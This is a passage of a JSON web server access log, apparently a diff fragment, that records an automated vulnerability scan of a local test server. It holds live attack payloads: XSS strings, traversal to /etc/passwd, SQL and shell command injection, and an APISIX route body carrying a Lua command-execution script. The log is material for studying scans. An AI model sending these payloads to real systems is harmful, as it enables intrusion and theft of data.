"http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:31 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /UI HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:31 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /system/login/SysLoginUser.aspx?Login=Denied&UID=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:31 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /development.log HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:31 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /database/schema.rb HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:31 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /login/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:31 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/api-docs/swagger.json HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:31 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /cobbler_web HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:31 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /v2/auth/roles HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.020","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:31 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /mysql.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:31 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /?rsd=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:31 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1';alert(/XSS/);//", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:31 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252Fetc%252Fpasswd%23foo/development HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:31 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /data/plugins_listing HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:31 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /libraries/joomla/database/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:31 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/super-forms/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:31 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php/Pan/ShareUrl/downloadSharedFile?true_path=../../../../../../windows/win.ini&file_name=win.ini HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:31 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /magmi/web/ajax_gettime.php?prefix=%22%3E%3Cscript%3Ealert(document.domain);%3C/script%3E%3C HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:31 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /login/sls/auth HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.020","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:31 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /env.test.js HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:31 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /src/redirect.php?plugins[]=../../../../etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:31 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /horde/util/barcode.php?type=../../../../../../../../../../../etc/./passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:31 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /sso/XUI HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:31 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /db/robomongo.json HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:31 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/experimental/patternfile?order=id%3Bselect(md5('nuclei'))&page=0&page_size=0 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:31 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /schema.rb HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:31 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-admin/admin-ajax.php?action=lp_background_single_email&lp-dismiss-notice=xxx HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:31 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/api-docs/swagger.yaml HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:31 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-admin/setup-config.php?step=1 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:31 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"-","request":"GET /signEzUI/playlist/edit/upload/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f../etc/passwd HTTP/1.1","status":"400","body_bytes_sents":"154","req_time":"0.001","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:31 +0000","request_body":"IWP_JSON_PREFIX","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST / HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:31 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /sql.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:31 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /' HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:31 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_mmsblog&controller=../../../../../../../../../../etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:31 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /log?type=%22%3C/script%3E%3Cscript%3Ealert(document.domain);%3C/script%3E%3Cscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:31 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /cgi-bin/nobody/Machine.cgi?action=get_capability HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:31 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /seeyon/personalBind.do.jpg/..;/ajax.do?method=ajaxAction&managerName=mMOneProfileManager&managerMethod=getOAProfile HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:31 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /STATE_ID/123/agentLogUploader HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:31 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /rest/menu/latest/admin HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:32 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /env.dev.js HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:32 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/wp-mailster/view/subscription/unsubscribe2.php?mes=%3C%2Fscript%3E%22%3E%3Cscript%3Ealert%28123%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.029","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:32 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /gespage/doDownloadData?file_name=../../../../../Windows/debug/NetSetup.log HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.031","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:32 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /sso/UI HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.030","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:32 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /robomongo.json HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:32 +0000","request_body":"{\x0D\x0A \x22uri\x22:\x22/29K6BgkwCWBWTfZ2LQgp0QaFRiw\x22,\x0D\x0A \x22script\x22:\x22local _M = {} \x5Cn function _M.access(conf, ctx) \x5Cn local os = require('os')\x5Cn local args = assert(ngx.req.get_uri_args()) \x5Cn local f = assert(io.popen(args.cmd, 'r'))\x5Cn local s = assert(f:read('*a'))\x5Cn ngx.say(s)\x5Cn f:close() \x5Cn end \x5Cnreturn _M\x22,\x0D\x0A \x22upstream\x22:{\x0D\x0A \x22type\x22:\x22roundrobin\x22,\x0D\x0A \x22nodes\x22:{\x0D\x0A \x22example.com:80\x22:1\x0D\x0A }\x0D\x0A }\x0D\x0A}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /apisix/admin/routes HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.029","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:32 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/config HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:32 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /debug.seam HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.034","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:32 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /cgi-bin/log.cgi HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:32 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/swagger-ui/swagger.json HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.033","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:32 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-admin/index.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.040","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:32 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /asynchPeople/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.044","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:32 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/adminer/adminer.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.039","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:32 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /admin/views/ajax/autocomplete/user/a HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.041","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:32 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /prweb/PRRestService/unauthenticatedAPI/v1/docs HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.035","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:32 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /upgrade_handle.php?cmd=writeuploaddir&uploaddir=%27;whoami;%27 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:32 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_rsfiles&task=files.display&path=../../../../../../../../../etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:32 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wfc/portal HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.030","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:32 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.hg/hgrc HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:32 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /env.prod.js HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:32 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /install/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:32 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_shoutbox&controller=../../../../../../../etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:32 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /sso/UI/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:32 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /kustomization.yml HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.029","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} 